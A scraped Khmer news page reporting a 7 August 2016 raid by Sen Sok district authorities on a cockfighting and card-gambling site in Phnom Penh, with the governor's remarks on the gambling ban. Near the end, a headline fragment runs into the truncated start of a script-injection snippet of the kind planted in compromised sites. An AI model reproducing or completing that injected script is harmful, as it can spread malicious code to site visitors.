គណៈបញ្ជាការឯកភាពខណ្ឌសែនសុខបើកប្រតិបត្តិការ ចុះបង្រ្កាបទីតាំង ជល់មាន់ និងវង់បៀដុះល្លែ នៅភូមិដំណាក់ សង្កាត់ភ្នំពេញថ្មី

ភ្នំពេញ៖ កម្លាំគណៈបញ្ជការឯកភាពខណ្ឌសែនសុខ ដោយមានការបញ្ជាផ្ទាល់ពី លោក ប៉ឹល កុសល

អភិបាលនៃគណៈអភិបាលខណ្ឌសែនសុខដឹកនាំចុះបង្ក្រាបដោយ លោកវរសេនីយ៍ ព្រំ សក្កដា មេបញ្ជាការមូលដ្ឋានកងរាជអាវុធហត្ថខណ្ឌសែនសុខ នៅព្រឹកថ្ងៃទី៧ខែសីហា ឆ្នាំ២០១៦នេះបានបើកប្រតិបត្តិការ ចុះបង្ក្រាបទីតាំងជល់មាន់ ស្ថិតក្នុងភូមិដំណាក់ សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ រាជធានីភ្នំពេញ។

ជាលទ្ធផលបានឃាត់ខ្លួនអ្នកស្នេហាបក្សីកីឡា និងអ្នកញៀនល្បែងបៀចំនួន៩នាក់មាន់ជល់៥ក្បាលម៉ូតូ២គ្រឿងនិងបៀរ១ហ៊ូរ ត្រូវបាននាំទៅកាន់ទីបញ្ជាការដ្ឋានកងរាជអាវុធហត្ថខណ្ឌសែនសុខដើម្បីសាកសួរ៕

លោក ប៉ឹល កុសល បានបញ្ជាក់ថា មុនឈានដល់ការបង្កាប់នេះ គឺមានសេចក្តីរាយការណ៍ថពីម្សិលម៉ិញថា ទីតាំងខាងលើមានបើកវង់ល្បែងស៊ីសង ប្រភេទជល់មាន និងបៀ យ៉ាងគគ្រឹកគគ្រេង ទើបព្រឹកថ្ងៃទី ៧ខែសីហា នេះ លោកបានបញ្ជាកម្លាំងបង្ក្រាបតែម្តង។

លោកកក៍បានបញ្ជាក់បន្ថែមទៀតថា រាជរដ្ឋាភិបាលក៏ដូចជាគណបញ្ជាការឯភាពរាជធានីភ្នំពេញ ក្រោមការដឹក នាំផ្ទាល់ពីឯកឧត្តម ប៉ា សុជាតិវង្ស អភិបាល នៃគណៈអភិបាលរាជធានីភ្នំពេញ និងជាប្រធានគណៈបញ្ជាការឯកភាពរាជធានីភ្នំពេញតែតែដាក់បទបញ្ជារដល់ស្ថាប័នពាក់ព័ន្ធ និងអាជ្ញាធរដែនដីគ្រលំដាប់ថ្នាក់ ត្រូវតែអនុវត្តអោយបានម៉ឺងម៉ាត់ ដោយមិនអនុញ្ញាតអោយមានល្បែងស៊ីសង ឬល្បែងភ្នាល់គ្រប់ប្រភេទស្ថិតនៅក្នុង ដែនសមត្ថកិច្ចរបស់ខ្លួនឡើយ។ អនុវត្តតាមស្មារតីនេះ ទើបគណៈបញ្ជាការឯកភាពខណ្ឌសែនសុខដឹកនាំអនុវត្តន៍ការងារនេះជាប្រចាំ ដើម្បីដោះស្រាយបញ្ហានេះជូនមូលដ្ឋានប្រជាពលរដ្ឋ ក៏ដូចជាសង្គមជាតិទាំងមូល ពីព្រោះ បញ្ហាល្បែស៊ីសង ល្បែងភ្នាល់ ហ្គេមបាញ់ត្រី ។ល។ គឺជាអ្នកផ្តើមអោយមាន បទល្មើសសង្គម អំពើហឹង្សាក្នុងគ្រួសារ។

ជាចុងក្រោយ លោកអភិបាលខណ្ឌបានធ្វើការប្តេជ្ញាចិត្តថា នឹងខិតខំបំរើកិច្ចការមួយនេះជូនប្រជាពលរដ្ឋអោយបានល្អ ហើយលោកក៏បានសំណូមពរដល់ប្រជាពលដ្ឋក្នុងមូលដ្ឋានខណ្ឌមានជ័យជួយសហការការងារនេះជូនអាជ្ញា ធរមូលដ្ឋានខណ្ឌ សង្កាត់អោយបានផុសផុល ដើម្បីលុបបំបាត់បញ្ហានេះអោយអស់ពីមូលដ្ឋាន ហើយលោកក៏បានអំពាវវនាវចំពោះស្ថាប័នមានសមត្ថកិច្ច និងមន្រ្តីពាក់ព័ន្ធអោយចូលរួមសហការអោយបានល្អ ជៀសវាងការយកតួនាទីភារកិច្ច ធ្វើជាផលប្រយោជន៍ផ្ទាល់ខ្លួន ដែលនាំអោយការអនុវត្តពុំសូវមានប្រសិទ្ធភាព។

24f9921a-5e13-4ef3-a61d-6f39a123dc13 64bf4804-7b7b-40d0-9434-af563f569100 04755b3e-8013-48bb-b029-821529c945621e4879aa-52dd-44e7-824d-939d865336f9 3ed14d32-7481-4426-a4f2-253e36f4259c 24f9921a-5e13-4ef3-a61d-6f39a123dc13 5443b5f4-f6bc-46dd-9eff-bc294f3d8d63 a3c65c70-cfde-417f-8d33-3b6e31e3a8b9 c440bca7-9377-45a5-8427-4e148b610e65 c753563d-ea0c-4d88-96e1-b1665ac37b99

ស្រ្ដីរងគ្រោះត្រូវបានគេប្លន់var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More